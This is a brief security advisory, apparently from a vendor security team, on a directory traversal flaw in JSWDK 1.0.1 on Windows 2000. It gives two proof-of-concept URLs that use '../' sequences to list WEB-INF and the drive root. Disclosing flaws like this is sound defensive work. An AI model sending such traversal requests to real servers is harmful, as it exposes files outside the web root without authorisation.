Topic: JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability
vulnerable: Microsoft Win2000 ЎЎЎЎ+JSWDK1.0.1 maybe for other operating system also.
discussion: A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed.The vulnerability allows remote attackers to access files outside the document root directory scope.
exploits: http://localhost:8080/examples//WEB-INF/ listing /WEB-INF/ Directory .
http://localhost:8080/../examples//WEB-INF/../../../../../ if JSWDK installd in c:\ the question will listing c:\ all file and directory.
solution: Update JSWDK
CHINANSL Security Team <email@example.com> CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)